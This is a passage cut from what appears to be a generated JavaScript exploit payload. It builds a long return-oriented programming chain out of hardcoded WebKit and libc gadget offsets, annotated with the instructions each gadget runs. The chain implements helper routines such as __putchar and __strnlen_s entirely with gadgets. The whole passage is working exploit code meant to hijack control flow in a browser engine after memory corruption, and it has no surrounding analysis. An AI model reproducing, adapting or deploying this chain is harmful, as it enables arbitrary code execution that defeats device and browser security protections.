0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2550: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2551: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+169504, //L2552+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+169496, //L2552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2552: db([0, 0]); // 0x0 set_gadgets([ ropchain+169520, //L2552+24 ropchain+170728, //L2547 libc_base+764760, //pop rsi ropchain+169560, //L2553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2553: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2555: db([16, 
0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+169680, //L2558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+169664, //L2556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2556: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2558: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+169840, //L2562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+169808, //L2560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+169824, //L2561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2559: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2560: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2562: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+169896, //L2564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2564: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+170024, //L2566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170040, //L2567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170008, //L2565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2565: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2566: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2567: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+170200, //L2571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+170168, //L2569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170184, //L2570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2568: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2570: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2571: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+170256, //L2573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2573: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+170384, //L2575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170400, //L2576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170368, //L2574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2574: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2576: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+170480, //L2577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170496, //L2578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2577: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2578: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+170592, //L2580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+170576, //L2579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2579: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2580: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2582: ropchain+170696, //L2581 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+570904, //__putchar //L2581: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L2547: libc_base+764760, //pop rsi ropchain+170808, //L2584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+170792, //L2583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2583: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2584: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+170912, //L2585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+170928, //L2586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2586: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+171048, //L2587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+171032, //L2588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2588: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2587: db([0, 0]); // 0x0 //__out_fct: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+171120, //L2590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2590: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+171216, //L2591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171248, //L2594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2593: db([32, 0]); // 0x20 set_gadget(webkit_base+568675,); //pop r8 //L2594: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+171352, //L2597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171336, //L2595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2595: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2597: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+171440, //L2598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+764760, //pop rsi ropchain+171456, //L2600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2598: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2600: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2601: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+171576, //L2604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171560, //L2602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2602: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2604: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+171664, //L2605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+171680, //L2607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2605: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2607: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2608: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+171800, //L2611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171784, //L2609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2609: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2611: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+171960, //L2615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+171928, //L2613 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+171944, //L2614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2612: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2613: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2614: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2615: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+172016, //L2617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2617: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+172144, //L2619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+172160, //L2620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172128, //L2618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2618: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2619: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2620: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+172320, //L2624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+172288, //L2622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172304, //L2623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2621: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2622: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2623: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2624: 
db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+172376, //L2626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2626: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+172504, //L2628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+172520, //L2629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172488, //L2627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2627: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2628: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2629: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+172632, //L2631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+172680, //L2634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+172648, //L2632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2631: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2632: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2634: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+172792, //L2635+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+172784, //L2635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp 
]); //L2635: db([0, 0]); // 0x0 set_gadgets([ ropchain+172808, //L2635+24 ropchain+175056, //L2630 libc_base+764760, //pop rsi ropchain+172848, //L2636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2636: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2638: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+172968, //L2641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+172952, //L2639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2641: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+173080, //L2642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+173128, //L2645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+173096, //L2643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2642: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2643: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2644: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L2645: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+173232, //L2648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173216, //L2646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2646: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2648: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+173376, //L2651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173344, //L2649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+173360, //L2650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2649: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2650: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2651: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+173456, //L2652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2652: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2654: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+173576, //L2657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173560, //L2655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2655: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2657: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+173736, //L2661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+173704, //L2659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+173720, //L2660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2658: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2659: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L2660: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2661: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+173792, //L2663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2663: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+173920, //L2665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+173936, //L2666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+173904, //L2664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2664: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2665: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2666: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+174096, //L2670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+174064, //L2668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+174080, //L2669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2667: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2668: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2670: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+174152, //L2672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2672: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl 
libc_base+764760, //pop rsi ropchain+174280, //L2674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+174296, //L2675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+174264, //L2673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2673: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2674: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2675: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+174376, //L2676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+174392, //L2677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2676: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2677: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+174488, //L2679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+174472, //L2678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2678: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2679: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+174568, //L2680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2682: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+174688, //L2685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+174672, //L2683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2683: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2685: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+174768, //L2686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+174784, //L2687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2686: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2687: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+174864, //L2689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+174896, //L2691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2689: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L2690: ropchain+175024, //L2688 libc_base+144605 //pop rdi ]); //L2691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+175000, //L2693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+175016, //L2692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2693: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2692: db([0, 0]); // 0x0 //L2688: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L2630: libc_base+764760, //pop rsi ropchain+175136, //L2695 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+175120, //L2694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2694: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2695: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175240, //L2696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+175256, //L2697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2696: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2697: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175376, //L2698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+175360, //L2699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2699: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2698: db([0, 0]); // 0x0 //__strnlen_s: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175448, //L2701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2701: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+175512, //L2703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2703: db([0, 0]); // 0x0 
